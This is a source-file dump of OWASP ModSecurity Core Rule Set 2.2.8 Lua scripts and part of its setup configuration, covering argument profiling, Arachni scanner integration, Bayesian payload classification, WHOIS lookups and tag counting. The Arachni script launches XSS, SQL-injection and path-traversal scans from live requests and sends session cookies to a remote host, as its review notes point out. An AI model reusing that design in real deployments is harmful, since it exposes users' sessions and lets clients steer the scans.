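-- Counts the entries returned for ARGS, bumps RESOURCE.NumOfArgs_counter_<n>
-- and, when that counter equals MinPatternThreshold, appends <n> to
-- RESOURCE.enforce_num_of_args. When TrafficCounter equals
-- MinTrafficThreshold it derives RESOURCE.MinNumOfArgs / RESOURCE.MaxNumOfArgs
-- from the learned list and resets the counter.
function ProfileNumOfArgs()
  local ARGS = m.getvars("ARGS", {"none"})
  local NumOfArgs = #ARGS

  local EnforceNumOfArgs = m.getvar("RESOURCE.enforce_num_of_args")
  local AlreadyEnforced = EnforcementListContains(EnforceNumOfArgs, NumOfArgs)
  if AlreadyEnforced then
    m.log(4, "ARGS #: " .. NumOfArgs .. " already in Enforcement List.")
  end

  local CounterKey = "RESOURCE.NumOfArgs_counter_" .. NumOfArgs
  local StoredCounter = m.getvar(CounterKey)
  local NumOfArgsCounter = tonumber(StoredCounter)
  if not NumOfArgsCounter then
    NumOfArgsCounter = 1
    m.log(4, "Current # of ARGS: " ..NumOfArgs.. " has not been previously seen.")
    m.log(4, "Creating " .. NumOfArgs .. " Pattern Score to: " .. NumOfArgsCounter)
  else
    NumOfArgsCounter = NumOfArgsCounter + 1
    m.log(4, "Current # of ARGS: " ..NumOfArgs.. " has been previously seen.")
    m.log(4, "Increasing " .. NumOfArgs .. " Pattern Score to: " .. NumOfArgsCounter)
  end
  m.setvar(CounterKey, NumOfArgsCounter)

  if (NumOfArgsCounter == MinPatternThreshold) then
    if not AlreadyEnforced then
      if not (EnforceNumOfArgs) then
        EnforceNumOfArgs = NumOfArgs
      else
        EnforceNumOfArgs = EnforceNumOfArgs .. ", " .. NumOfArgs
      end
    end
    -- The original message named the EnforceRequestMethods list here.
    m.log(4, "NumOfArgs Reached Pattern Threshold. Adding it to the EnforceNumOfArgs list: " .. EnforceNumOfArgs)
    m.setvar("RESOURCE.enforce_num_of_args", EnforceNumOfArgs)
  end

  if (TrafficCounter == MinTrafficThreshold) then
    -- Collect the learned counts. The list may still be unset when the
    -- traffic threshold is reached; the original passed nil to string.gmatch
    -- and called math.min() without arguments in that case.
    local LearnedCounts = {}
    if EnforceNumOfArgs ~= nil then
      for num in string.gmatch(tostring(EnforceNumOfArgs), "%d+") do
        LearnedCounts[#LearnedCounts + 1] = tonumber(num)
      end
    end
    if #LearnedCounts > 0 then
      local MinNumOfArgs = math.min(unpack(LearnedCounts))
      m.setvar("RESOURCE.MinNumOfArgs", MinNumOfArgs)
      local MaxNumOfArgs = math.max(unpack(LearnedCounts))
      m.setvar("RESOURCE.MaxNumOfArgs", MaxNumOfArgs)
      m.log(4, "Min # of ARGS: " ..MinNumOfArgs.. " and Max # of ARGS: " ..MaxNumOfArgs.. ".")
    else
      m.log(4, "No # of ARGS learned yet. Skipping Min/Max calculation.")
    end
    m.setvar("!RESOURCE.NumOfArgs_counter_" .. NumOfArgs, "0")
  end
end

-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/arachni_integration.lua
-- ---------------------------------------------------------------------------
--
-- Include Arachni RPC client code
--
require "client"

-- Literal, whole-entry membership test for a ", "-separated list.
-- Parameter names reported by the scanner originate from request data, so
-- they must not be handed to string.find() as Lua patterns.
local function VulnListContains(list, item)
  if list == nil or item == nil then
    return false
  end
  local wanted = tostring(item)
  for entry in string.gmatch(tostring(list), "[^,]+") do
    if string.match(entry, "^%s*(.-)%s*$") == wanted then
      return true
    end
  end
  return false
end

-- Adds finding["var"] to the ", "-separated list stored under resource_key
-- unless it is already listed. list_label ("XSS" / "SQLi") is used only in
-- the log message.
local function RecordVulnerableParam(resource_key, list_label, finding)
  local param = finding["var"]
  if param == nil then
    return
  end
  local known = m.getvar(resource_key)
  if known ~= nil and VulnListContains(known, param) then
    m.log(4, "Arachni: Arg Name: " .. param .. " already in " .. list_label .. " Vuln list.")
    return
  end
  m.log(4, "Arachni: Vulnerability Identified for Parameter: \"" .. param .. "\", Vulnerability Type: \"" .. tostring(finding["mod_name"]) .. "\"")
  if known == nil then
    m.setvar(resource_key, param)
  else
    m.setvar(resource_key, known .. ", " .. param)
  end
end

--
-- Call main ModSecurity Lua function
--
-- First request for a resource: asks the Arachni dispatcher for a scanner
-- instance, feeds it the current request (URL, method, ARGS, cookies) and
-- stores the instance port/token in the RESOURCE collection.
-- Later requests: polls that instance and, once it is idle, records the
-- parameters reported for the XSS and SQLInjection modules in
-- RESOURCE.xss_vulnerable_params / RESOURCE.sqli_vulnerable_params.
--
-- Returns a status string, or nil when the request cannot be used.
--
-- NOTE(review): the scan target is built from the client-supplied Host
-- header. The syntax check below only rejects malformed values; it does not
-- pin the target to this site. Compare the host against the names this
-- server actually serves before enabling the script.
-- NOTE(review): request cookies and the instance token are sent to / stored
-- for the remote RPC host; restrict who can reach that host and read the
-- RESOURCE collection.
function main()
  --
  -- Set the remote Arachni RPC host
  --
  local arachni_host = '192.168.168.128'

  --
  -- Extract Request Data
  --
  local host = m.getvar("REQUEST_HEADERS.host")
  local host_is_wellformed = host ~= nil
    and (string.match(host, "^[%w%.%-]+$") or string.match(host, "^[%w%.%-]+:%d+$"))
  if not host_is_wellformed then
    -- Covers a missing Host header as well as IPv6 literals, which this
    -- simple check does not accept.
    m.log(4, "Arachni: Missing or malformed Host header. Exiting.")
    return nil
  end
  local request_filename = m.getvar("REQUEST_FILENAME")
  local request_method = m.getvar("REQUEST_METHOD")
  if request_filename == nil or request_method == nil then
    m.log(4, "Arachni: Request filename or method not available. Exiting.")
    return nil
  end
  m.log(4, "Arachni: Host: " .. host)
  m.log(4, "Arachni: Filename: " .. request_filename)
  local url_to_scan = "http://" .. host .. request_filename
  m.log(4, "Arachni: URL to scan is: " .. url_to_scan)
  m.log(4, "Arachni: Request Method is: " .. request_method)

  --
  -- Convert ModSecurity ARGS data into a local table called args
  --
  local ARGS = m.getvars("ARGS")
  local args = {}
  for _, arg in pairs(ARGS or {}) do
    local arg_name = string.gsub(arg["name"], "ARGS:(.*)", "%1")
    local arg_value = arg["value"]
    m.log(4, "Arachni: Arg Name: " ..arg_name.. " and Value: " ..arg_value.. ".");
    args[arg_name] = arg_value
  end
  local yaml_args = yaml.dump ( args )
  m.log(4, "Arachni: Updated ARGS table is: " .. yaml_args)

  --
  -- Convert ModSecurity COOKIE data into a local table called cookies_table
  --
  -- Only cookie names are logged: the values are typically session
  -- credentials and do not belong in the debug log.
  local COOKIES = m.getvars("REQUEST_COOKIES")
  local cookies_table = {}
  for _, cookie in pairs(COOKIES or {}) do
    local cookie_name = string.gsub(cookie["name"], "REQUEST_COOKIES:(.*)", "%1")
    m.log(4, "Arachni: Cookie Name: " ..cookie_name.. ".");
    cookies_table[cookie_name] = cookie["value"]
  end

  --
  -- Check to see if we have previously initiated a scan for the resource
  --
  -- If we have not, then we will contact the Dispatcher and start a scan
  --
  local arachni_scan_initiated = m.getvar("RESOURCE.arachni_scan_initiated")
  if arachni_scan_initiated == nil then
    --
    -- Initiate Arachni RPC Dispatchers
    --
    -- Done only in this branch: the original dispatched a new instance on
    -- every request, including the ones that merely poll an existing scan.
    local dispatcher = ArachniRPCClient:new( { host = arachni_host, port = 7331 } )
    local instance_info = dispatcher:call( 'dispatcher.dispatch' )
    if instance_info == nil then
      m.log(4, "Arachni: Dispatcher returned no instance. Exiting.")
      return nil
    end

    --
    -- Set the host to match the remote Dispatcher
    --
    local instance = ArachniRPCClient:new({
      host = arachni_host,
      port = instance_info.port,
      token = instance_info.token
    })
    local opts = {
      url = url_to_scan,
      audit_links = true,
      audit_forms = true,
      audit_cookies = true,
      -- only audit the stuff passed to vector feed
      link_count_limit = 0,
      cookies = cookies_table
    }
    instance:call( 'modules.load', { 'xss', 'sqli', 'path_traversal' } )

    local vectors = {}
    -- add a form var (for POST params)
    table.insert( vectors, {
      type = 'form',
      method = request_method,
      action = url_to_scan,
      inputs = args
    })
    local yaml_vectors = yaml.dump( vectors )
    m.log(4, "Arachni: Yaml output of vectors is: " .. yaml_vectors)

    local plugins = { vector_feed = { vectors = vectors } }
    instance:call( 'plugins.load', plugins )
    instance:call( 'opts.set', opts )
    instance:call( 'framework.run' )

    --
    -- Save the Dispatcher port/token data to pull the report later
    --
    m.setvar("RESOURCE.arachni_scan_initiated", "1")
    m.setvar("RESOURCE.arachni_instance_info_port", instance_info.port)
    m.setvar("RESOURCE.arachni_instance_info_token", instance_info.token)
    return ("Arachni: Scan Initiated. Exiting")
  end

  --
  -- If we have previously initiated a scan, we will now check for a report
  --
  m.log(4, "Arachni: Previous scan was initiated, checking scan status.")
  local instance_info_port = m.getvar("RESOURCE.arachni_instance_info_port")
  local instance_info_token = m.getvar("RESOURCE.arachni_instance_info_token")
  if instance_info_port == nil or instance_info_token == nil then
    m.log(4, "Arachni: Stored instance port/token missing. Exiting.")
    return nil
  end
  -- The token authenticates RPC calls to the instance, so it is not logged.
  m.log(4, "Arachni: Port info: " .. instance_info_port .. " (token not logged)")

  local instance = ArachniRPCClient:new({
    host = arachni_host,
    port = instance_info_port,
    token = instance_info_token
  })
  if instance:call( 'framework.busy?' ) then
    m.log(4, "Arachni: Scan still in progress, framework is busy. Exiting.")
    return ("Arachni scan still in progress, framework is busy. Exiting.")
  end

  m.log(4, "Arachni: Scan completed - calling for report.")
  local results = instance:call( 'framework.issues_as_hash' )
  local yaml_results = yaml.dump( results )
  m.log(4, "Arachni: Yaml Results: " .. yaml_results)
  for _, finding in pairs(results or {}) do
    if ( finding["mod_name"] == "XSS" ) then
      RecordVulnerableParam("RESOURCE.xss_vulnerable_params", "XSS", finding)
    elseif ( finding["mod_name"] == "SQLInjection" ) then
      RecordVulnerableParam("RESOURCE.sqli_vulnerable_params", "SQLi", finding)
    end
  end
  instance:call( 'service.shutdown' )
  m.setvar("RESOURCE.arachni_scan_completed", "1")
  return ("Arachni: Done")
end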
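-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/bayes_check_spam.lua
-- ---------------------------------------------------------------------------
#!/usr/bin/env lua
require("io");

-- Serialises one value as Lua source text: strings are quoted (newlines
-- written as \n), tables go through table.tostring, everything else through
-- tostring().
function table.val_to_str ( v )
  if "string" == type( v ) then
    v = string.gsub( v, "\n", "\\n" )
    -- A string whose only quote characters are double quotes is wrapped in
    -- single quotes instead of being escaped.
    local quotes_only = string.gsub( v, "[^'\"]", "" )
    if string.match( quotes_only, '^"+$' ) then
      return "'" .. v .. "'"
    end
    local escaped = string.gsub( v, '"', '\\"' )
    return '"' .. escaped .. '"'
  end
  if "table" == type( v ) then
    return table.tostring( v )
  end
  return tostring( v )
end

-- Serialises a table key: identifier-like strings are written bare, any
-- other key as [value].
function table.key_to_str ( k )
  if "string" == type( k ) and string.match( k, "^[_%a][_%a%d]*$" ) then
    return k
  end
  return "[" .. table.val_to_str( k ) .. "]"
end

-- Serialises a table as "{...}": the array part first, then the remaining
-- key=value pairs.
function table.tostring( tbl )
  local result, done = {}, {}
  for k, v in ipairs( tbl ) do
    table.insert( result, table.val_to_str( v ) )
    done[ k ] = true
  end
  for k, v in pairs( tbl ) do
    if not done[ k ] then
      table.insert( result, table.key_to_str( k ) .. "=" .. table.val_to_str( v ) )
    end
  end
  return "{" .. table.concat( result, "," ) .. "}"
end

-- Classifies every request argument with moonfilter and raises an alert for
-- the first one classified as spam with a probability above 0.90.
--
-- Runs only when TX.ANOMALY_SCORE is not a number. On an alert it sets
-- tx.bayes_score, tx.bayes_var_name and tx.bayes_var and returns the alert
-- text; otherwise it returns nil.
function main()
  local mf = require "moonfilter"
  -- define the classes to use
  mf.classes("/var/log/httpd/spam", "/var/log/httpd/ham")
  -- create ham+spam DB on disk
  -- this is only necessary the first time
  -- use command line moonfilter.lua to initially create the DBs outside
  -- of ModSecurity
  --mf.create()
  local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none");
  anomaly_score = tonumber(anomaly_score);
  if anomaly_score then
    return nil;
  end

  local args = m.getvars("ARGS", {"none"});
  -- The original compared #args with the string "0", which is never equal
  -- to a number, so this early exit was dead code.
  if (#args == 0) then
    m.log(4, "# of ARGS: " ..#args.. ".");
    return nil;
  end

  -- Place ARGS data into key/value pairs for inspection
  for _, arg in pairs(args) do
    local name = arg["name"];
    local value = arg["value"];
    m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. ".");
    mf.text = value;
    local class_result = mf.classify()
    class_result = table.tostring(class_result)
    m.log(4, "Classify Results: " .. class_result .. ".")
    local class = string.gsub(class_result, ".*class=\"(.*)\".*", "%1")
    if (class == "/var/log/httpd/spam") then
      -- The original pattern required one digit, any character and exactly
      -- fourteen digits followed by a comma. tostring() prints shorter
      -- values such as 1 or 0.95 without padding, so those results
      -- produced no alert. Accept any numeric literal after "prob=".
      local prob_text = string.gsub(class_result, ".*prob=([%d%.eE%+%-]+).*", "%1")
      local score = tonumber(prob_text)
      if score and score > 0.90 then
        m.log(4, "Classify Results: " .. class .. ".")
        m.setvar("tx.bayes_score", class_result);
        m.setvar("tx.bayes_var_name", name);
        m.setvar("tx.bayes_var", value);
        return("Bayesian Analaysis Alert for " .. name .. " with payload: \"" .. value .. "\"")
      end
    end
  end
  return nil;
end

-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/bayes_train_ham.lua
-- ---------------------------------------------------------------------------
#!/usr/bin/lua
require("io");

-- Trains the moonfilter "ham" class on every request argument value.
--
-- Returns nil when the request has no arguments, otherwise sets tx.bayes_msg
-- and returns a message naming the last value that was trained.
--
-- NOTE(review): this feeds client-supplied payloads into the model as
-- known-good samples. Whoever can send requests that reach this script can
-- shift the classifier, so the calling rule should only run it for traffic
-- that is trusted to be benign.
function main()
  local mf = require "moonfilter"
  -- define the classes to use
  mf.classes("/var/log/httpd/spam", "/var/log/httpd/ham")
  -- create ham+spam DB on disk
  -- this is only necessary the first time
  -- mf.create()
  local score = ""   -- never assigned a real score; only echoed in the log line below
  local value = ""
  local args = m.getvars("ARGS", {"none"});
  if (#args == 0) then
    m.log(4, "# of ARGS: " ..#args.. ".");
    return nil;
  end
  -- Place ARGS data into key/value pairs for inspection
  for _, arg in pairs(args) do
    local name = arg["name"];
    value = arg["value"];
    m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. ".");
    mf.text = value;
    mf.train("/var/log/httpd/ham")
  end
  -- return nil;
  m.log(4, "Low Bayesian Score: " .. score .. ". Training payloads as non-malicious.")
  m.setvar("tx.bayes_msg", "Training payload as ham: " .. value .. ".");
  return ("Training payloads as non-malicious: " .. value .. ".");
end

-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/bayes_train_spam.lua
-- ---------------------------------------------------------------------------
#!/usr/bin/lua
require("io");

-- Serialises one value as Lua source text: strings are quoted (newlines
-- written as \n), tables go through table.tostring, everything else through
-- tostring().
function table.val_to_str ( v )
  if "string" == type( v ) then
    v = string.gsub( v, "\n", "\\n" )
    local quotes_only = string.gsub( v, "[^'\"]", "" )
    if string.match( quotes_only, '^"+$' ) then
      return "'" .. v .. "'"
    end
    local escaped = string.gsub( v, '"', '\\"' )
    return '"' .. escaped .. '"'
  end
  if "table" == type( v ) then
    return table.tostring( v )
  end
  return tostring( v )
end

-- Serialises a table key: identifier-like strings are written bare, any
-- other key as [value].
function table.key_to_str ( k )
  if "string" == type( k ) and string.match( k, "^[_%a][_%a%d]*$" ) then
    return k
  end
  return "[" .. table.val_to_str( k ) .. "]"
end

-- Serialises a table as "{...}": the array part first, then the remaining
-- key=value pairs.
function table.tostring( tbl )
  local result, done = {}, {}
  for k, v in ipairs( tbl ) do
    table.insert( result, table.val_to_str( v ) )
    done[ k ] = true
  end
  for k, v in pairs( tbl ) do
    if not done[ k ] then
      table.insert( result, table.key_to_str( k ) .. "=" .. table.val_to_str( v ) )
    end
  end
  return "{" .. table.concat( result, "," ) .. "}"
end

-- Trains the moonfilter "spam" class on the variables that matched the
-- calling rule (MATCHED_VARS).
--
-- Sets tx.bayes_msg and returns a completion message, or returns nil when
-- there is nothing to train on.
--
-- NOTE(review): the return sits inside the loop, so only the first entry
-- visited is trained. Kept as in the original; confirm whether all matched
-- variables were meant to be trained.
function main()
  local mf = require "moonfilter"
  -- define the classes to use
  mf.classes("/var/log/httpd/spam", "/var/log/httpd/ham")
  -- create ham+spam DB on disk
  -- this is only necessary the first time
  -- mf.create()
  local args = m.getvars("MATCHED_VARS", {"none"});
  -- The original compared #args with the string "0", which never matches.
  if (#args == 0) then
    m.log(4, "# of ARGS: " ..#args.. ".");
    return nil;
  end
  -- Place ARGS data into key/value pairs for inspection
  for _, arg in pairs(args) do
    local name = arg["name"];
    local value = arg["value"];
    m.log(4, "Arg Name: " ..name.. " and Arg Value: " ..value.. ".");
    mf.text = value;
    local train_result = mf.train("/var/log/httpd/spam")
    train_result = table.tostring(train_result)
    m.log(4, "Train Results: " .. train_result .. ".")
    m.setvar("tx.bayes_msg", "Completed Bayesian SPAM Training on Payload: " .. mf.text .. ".");
    return("Completed Bayesian SPAM Training on Payload: " .. mf.text .. ".");
  end
  return nil;
end

-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/gather_ip_data.lua
-- ---------------------------------------------------------------------------
#!/opt/local/bin/lua
require("io");

-- Looks up reverse DNS and WHOIS abuse data for an address and stores the
-- matching output lines in tx.hostname / tx.abuse_contact.
--
-- Runs only when TX.ANOMALY_SCORE is set and IP.HOSTNAME is not. Returns a
-- summary string when the lookup ran, nil otherwise.
--
-- The address is placed on a shell command line, so it is accepted only when
-- it consists solely of hex digits, dots and colons (an IPv4/IPv6 literal
-- shape). The original interpolated the raw value between single quotes,
-- which let request data reach the shell.
--
-- NOTE(review): the address is read from ARGS.REMOTE_ADDR, i.e. a request
-- parameter named REMOTE_ADDR, not from the connection's REMOTE_ADDR
-- variable. Confirm which one is intended; a request parameter is chosen by
-- the client.
-- NOTE(review): nslookup and whois run synchronously inside request
-- processing; consider the latency and outbound traffic this adds.
function main()
  local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none");
  m.log(4, "Anomaly Score is: " .. tostring(anomaly_score) .. ".");
  local remote_addr = m.getvar("ARGS.REMOTE_ADDR", "none");
  m.log(4, "Remote IP is: " .. tostring(remote_addr) .. ".");
  local ip_hostname = m.getvar("IP.HOSTNAME", "none");

  if anomaly_score == nil or ip_hostname ~= nil then
    return nil;
  end
  if remote_addr == nil
     or #remote_addr > 45
     or not string.match(remote_addr, "^[%x%.:]+$") then
    m.log(4, "Remote IP is not an IP address literal. Skipping nslookup/whois.");
    return nil;
  end

  local hostname = "NONE";
  local abuse_contact = "NONE";
  local tmp_path = os.tmpname ()
  os.execute ("nslookup '" .. remote_addr .. "' > '" .. tmp_path .. "'")
  os.execute ("whois '" .. remote_addr .. "' >> '" .. tmp_path .. "'")
  -- Open explicitly so a missing output file does not raise and the
  -- temporary file is always removed afterwards.
  local lookup_output = io.open (tmp_path, "r")
  if lookup_output then
    for line in lookup_output:lines () do
      if string.find(line, "name = ", 1, true) then
        hostname = line
      end
      if string.find(line, "abuse", 1, true) then
        abuse_contact = line
      end
    end
    lookup_output:close ()
  end
  os.remove (tmp_path)

  m.log(4, "Hostname is: " .. hostname .. ".");
  m.setvar("tx.hostname", hostname);
  m.log(4, "Abuse Contact is: " .. abuse_contact .. ".");
  m.setvar("tx.abuse_contact", abuse_contact);
  return("Nslookup: " .. hostname .. " and WHOIS Abuse Info: " .. abuse_contact .. "");
end

-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/osvdb.lua
-- ---------------------------------------------------------------------------
#!/opt/local/bin/lua
local request_filename = m.getvar("REQUEST_FILENAME", "none")
local args = {};
args = m.getvars("ARGS_NAMES", "none")

-- Checks the request against the local vulnerabilities.txt list.
--
-- A line matches when it contains the request filename, starts with digits
-- followed by a comma, and contains "<argument name>=" for one of the
-- request's argument names. On a match the line is stored in tx.osvdb_msg,
-- resource.osvdb_check and resource.osvdb_vulnerable are set to "1" and the
-- line is returned. Otherwise only resource.osvdb_check is set and nil is
-- returned.
--
-- The filename and argument names come from the request, so they are
-- searched as plain text (4th argument of string.find) instead of being
-- interpreted as Lua patterns.
function main ()
  if request_filename == nil then
    m.setvar("resource.osvdb_check", "1")
    return nil
  end
  for line in io.lines("/usr/local/apache/conf/modsec_current/base_rules/vulnerabilities.txt") do
    if string.find(line, request_filename, 1, true) and string.find(line, "^%d+,") then
      for _, arg in pairs(args) do
        local arg_name = arg["value"] .. "=";
        if string.find(line, arg_name, 1, true) then
          m.setvar("resource.osvdb_check", "1")
          m.setvar("resource.osvdb_vulnerable", "1")
          m.setvar("tx.osvdb_msg", line)
          return(line)
        end
      end
    end
  end
  m.setvar("resource.osvdb_check", "1")
  return nil
end

-- ---------------------------------------------------------------------------
-- tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/profile_page_scripts.lua
-- ---------------------------------------------------------------------------
#!/opt/local/bin/lua

-- Counts non-overlapping literal occurrences of needle in haystack.
local function count_occurrences(haystack, needle)
  local count, from = 0, 1
  while true do
    local first, last = string.find(haystack, needle, from, true)
    if not first then
      return count
    end
    count = count + 1
    from = last + 1
  end
end

-- Counts script, iframe, link and image markers in the response body and
-- stores them in tx.nscripts, tx.niframes, tx.nlinks and tx.nimages.
-- Always returns nil.
--
-- The body is lower-cased before counting because HTML tag names are
-- case-insensitive; the original counted only the lower-case spellings, so
-- markup written as <SCRIPT or <IFRAME was not counted.
function main()
  local response_body = m.getvar("RESPONSE_BODY", "none");
  -- A missing body made the original fail inside string.gsub.
  if response_body == nil or response_body == "" then
    return nil;
  end

  local body = string.lower(response_body)
  local nscripts = count_occurrences(body, "<script")
  local niframes = count_occurrences(body, "<iframe")
  local nlinks = count_occurrences(body, "a href")
  local nimages = count_occurrences(body, "<img")

  m.log(3, "niframes[" .. niframes .. "]");
  m.setvar("tx.niframes", niframes);
  m.log(3, "nscripts[" .. nscripts .. "]");
  m.setvar("tx.nscripts", nscripts);
  m.log(3, "nlinks[" .. nlinks .. "]");
  m.setvar("tx.nlinks", nlinks);
  m.log(3, "nimages[" .. nimages .. "]");
  m.setvar("tx.nimages", nimages);
  return nil;
end

# ---------------------------------------------------------------------------
# tar member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/modsecurity_crs_10_setup.conf.example
# ---------------------------------------------------------------------------
# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -- [[ Recommended Base Configuration ]] ------------------------------------------------- # # The configuration directives/settings in this file are used to control # the OWASP ModSecurity CRS. These settings do **NOT** configure the main # ModSecurity settings such as: # # - SecRuleEngine # - SecRequestBodyAccess # - SecAuditEngine # - SecDebugLog # # You should use the modsecurity.conf-recommended file that comes with the # ModSecurity source code archive. # # Ref: https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended # # # -- [[ Rule Version ]] ------------------------------------------------------------------- # # Rule version data is added to the "Producer" line of Section H of the Audit log: # # - Producer: ModSecurity for Apache/2.7.0-rc1 (http://www.modsecurity.org/); OWASP_CRS/2.2.4. 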
#
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature
#
SecComponentSignature "OWASP_CRS/2.2.8"

#
# -- [[ Modes of Operation: Self-Contained vs. Collaborative Detection ]] -----------------
#
# Each detection rule uses the "block" action which will inherit the SecDefaultAction
# specified below. Your settings here will determine which mode of operation you use.
#
# -- [[ Self-Contained Mode ]] --
# Rules inherit the "deny" disruptive action. The first rule that matches will block.
#
# -- [[ Collaborative Detection Mode ]] --
# This is a "delayed blocking" mode of operation where each matching rule will inherit
# the "pass" action and will only contribute to anomaly scores. Transactional blocking
# can be applied later, based on the accumulated anomaly score.
#
# -- [[ Alert Logging Control ]] --
# You have three options -
#
# - To log to both the Apache error_log and ModSecurity audit_log file use: "log"
# - To log *only* to the ModSecurity audit_log file use: "nolog,auditlog"
# - To log *only* to the Apache error_log file use: "log,noauditlog"
#
# Ref: http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-traditional-vs-anomaly-scoring-detection-modes.html
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecDefaultAction
#
# NOTE: the value below uses "deny", i.e. Self-Contained mode as described above,
# and "log", i.e. alerts go to both the error_log and the audit_log. For
# Collaborative Detection the rules have to inherit "pass" instead, and the
# anomaly-scoring switch (rule 900004, commented out later in this file) has to
# be enabled. Changing only one of the two leaves the rule set in neither mode.
#
SecDefaultAction "phase:1,deny,log"

#
# -- [[ Collaborative Detection Severity Levels ]] ----------------------------------------
#
# These are the default scoring points for each severity level. You may
# adjust these to your liking. These settings will be used in macro expansion
# in the rules to increment the anomaly scores when rules match.
#
# These are the default Severity ratings (with anomaly scores) of the individual rules -
#
#    - 2: Critical - Anomaly Score of 5.
#         Is the highest severity level possible without correlation. It is
#         normally generated by the web attack rules (40 level files).
#    - 3: Error - Anomaly Score of 4.
#         Is generated mostly from outbound leakage rules (50 level files).
#    - 4: Warning - Anomaly Score of 3.
#         Is generated by malicious client rules (35 level files).
#    - 5: Notice - Anomaly Score of 2.
#         Is generated by the Protocol policy and anomaly files.
#
# Rule 900001 only stores the per-severity scores in TX variables; it matches
# on every transaction (SecAction), logs nothing and passes.
SecAction \
  "id:'900001', \
  phase:1, \
  t:none, \
  setvar:tx.critical_anomaly_score=5, \
  setvar:tx.error_anomaly_score=4, \
  setvar:tx.warning_anomaly_score=3, \
  setvar:tx.notice_anomaly_score=2, \
  nolog, \
  pass"

#
# -- [[ Collaborative Detection Scoring Initialization and Threshold Levels ]] ------------------------------
#
# These variables are used in macro expansion in the 49 inbound blocking and 59
# outbound blocking files.
#
# **MUST HAVE** ModSecurity v2.5.12 or higher to use macro expansion in numeric
# operators. If you have an earlier version, edit the 49/59 files directly to
# set the appropriate anomaly score levels.
#
# You should set the score level (rule 900003) to the proper threshold you
# would prefer. If set to "5" it will work similarly to previous Mod CRS rules
# and will create an event in the error_log file if there are any rules that
# match. If you would like to lessen the number of events generated in the
# error_log file, you should increase the anomaly score threshold to something
# like "20". This would only generate an event in the error_log file if there
# are multiple lower severity rule matches or if any 1 higher severity item matches.
#
# NOTE(review): with the scores set in rule 900001 the highest single-rule
# contribution is 5, so a threshold of 20 is not reached by one critical match
# on its own; it needs several matches in the same transaction. Raising the
# threshold therefore also raises the number of matches a request can produce
# before it is reported or blocked. Choose the value with that trade-off in mind.
#
# Rule 900002 resets the per-transaction score counters to 0.
SecAction \
  "id:'900002', \
  phase:1, \
  t:none, \
  setvar:tx.anomaly_score=0, \
  setvar:tx.sql_injection_score=0, \
  setvar:tx.xss_score=0, \
  setvar:tx.inbound_anomaly_score=0, \
  setvar:tx.outbound_anomaly_score=0, \
  nolog, \
  pass"

# Rule 900003 sets the thresholds: 5 for inbound, 4 for outbound.
SecAction \
  "id:'900003', \
  phase:1, \
  t:none, \
  setvar:tx.inbound_anomaly_score_level=5, \
  setvar:tx.outbound_anomaly_score_level=4, \
  nolog, \
  pass"

#
# -- [[ Collaborative Detection Blocking ]] -----------------------------------------------
#
# This is a collaborative detection mode where each rule will increment an overall
# anomaly score for the transaction.
# The scores are then evaluated in the following files:
#
# Inbound anomaly score - checked in the modsecurity_crs_49_inbound_blocking.conf file
# Outbound anomaly score - checked in the modsecurity_crs_59_outbound_blocking.conf file
#
# If you want to use anomaly scoring mode, then uncomment this line.
# (The whole rule below is commented out by the single leading "#", because each
# line ends with a continuation backslash.)
#
#SecAction \
  "id:'900004', \
  phase:1, \
  t:none, \
  setvar:tx.anomaly_score_blocking=on, \
  nolog, \
  pass"

#
# -- [[ GeoIP Database ]] -----------------------------------------------------------------
#
# There are some rulesets that need to inspect the GEO data of the REMOTE_ADDR data.
#
# You must first download the MaxMind GeoIP Lite City DB -
#
# http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#
# NOTE: the URL above is plain HTTP, so the download is not authenticated in
# transit. Verify the file through a channel you trust before using it, since
# rules will make decisions based on its contents.
#
# You then need to define the proper path for the SecGeoLookupDb directive
#
# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html
# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html
#
#SecGeoLookupDb /opt/modsecurity/lib/GeoLiteCity.dat

#
# -- [[ Regression Testing Mode ]] --------------------------------------------------------
#
# If you are going to run the regression testing mode, you should uncomment the
# following rule. It will enable DetectionOnly mode for the SecRuleEngine and
# will enable Response Header tagging so that the client testing script can see
# which rule IDs have matched.
#
# You must specify the source IP address from which you will be running the
# tests.
#
# NOTE: while this rule is enabled, requests from the matching address are
# never blocked (ctl:ruleEngine=DetectionOnly). Keep it commented out outside
# of test runs, and remember that behind a reverse proxy REMOTE_ADDR is the
# proxy's address, so the match would then cover every client of that proxy.
#
#SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \
  "id:'900005', \
  phase:1, \
  t:none, \
  ctl:ruleEngine=DetectionOnly, \
  setvar:tx.regression_testing=1, \
  nolog, \
  pass"

#
# -- [[ HTTP Policy Settings ]] ----------------------------------------------------------
#
# Set the following policy settings here and they will be propagated to the 23 rules
# file (modsecurity_common_23_request_limits.conf) by using macro expansion.
# If you run into false positives, you can adjust the settings here.
#
# Only the max number of args is uncommented by default, as the other limits
# have a high rate of false positives. Uncomment the items you wish to set.
#
# NOTE(review): presumably the checks in the 23 rules file that expand a
